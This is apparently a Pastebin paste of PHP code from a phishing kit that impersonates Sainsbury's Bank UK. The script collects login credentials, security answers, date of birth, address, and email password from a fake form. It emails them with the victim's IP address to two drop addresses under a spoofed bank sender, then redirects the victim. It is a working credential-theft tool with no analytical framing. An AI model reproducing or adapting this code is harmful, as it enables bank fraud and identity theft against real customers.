Advertisement
m0rg4n

Untitled

Oct 17th, 2013
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.29 KB | None | 0 0
  1. <?
  2. $to = "kingk2333@gmail.com, dmxxxx44@gmail.com";
  3. //-----------------------------------------
  4. $txtusername = $_POST['txtusername'];
  5. $txtpassword = $_POST['txtpassword'];
  6. $txtSecurityAnswer_name = $_POST['txtSecurityAnswer_name'];
  7. $txtf_name = $_POST['txtf_name'];
  8. $txtDOB = $_POST['txtDOB'];
  9. $txtHname = $_POST['txtHname'];
  10. $txtmemorablesinger = $_POST['txtmemorablesinger'];
  11. $txtmemorablesplace = $_POST['txtmemorablesplace'];
  12. $txtmemorable_q = $_POST['txtmemorable_q'];
  13. $txtmemorable_a = $_POST['txtmemorable_a'];
  14. $txtemail_a = $_POST['txtemail_a'];
  15. $txtemail_p = $_POST['txtemail_p'];
  16. $ip = $_SERVER['REMOTE_ADDR'];
  17. $subj = "Sainsbury's Bank UK";
  18. $msg = "Your username : $txtusername\nYour password : $txtpassword\nYour memorable name : $txtSecurityAnswer_name\nYour Full Name : $txtf_name\nYour Date of Birth : $txtDOB\nYour House name or address : $txtHname\nYour memorable singer : $txtmemorablesinger\nYour memorable place : $txtmemorablesplace\nYour memorable Question : $txtmemorable_q\nYour memorable Answer : $txtmemorable_a\nYour email address : $txtemail_a\nYour email password : $txtemail_p\nip : $ip";
  19. $from = "From: BraIn Inc�<mail@online.sainsburysbank.co.uk>";
  20. if (mail($to,$subj,$msg,$from))
  21. {echo "<script>location.replace('hmrcfinish.htm');</script>";} ?>
  22. <html>
  23. <head>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement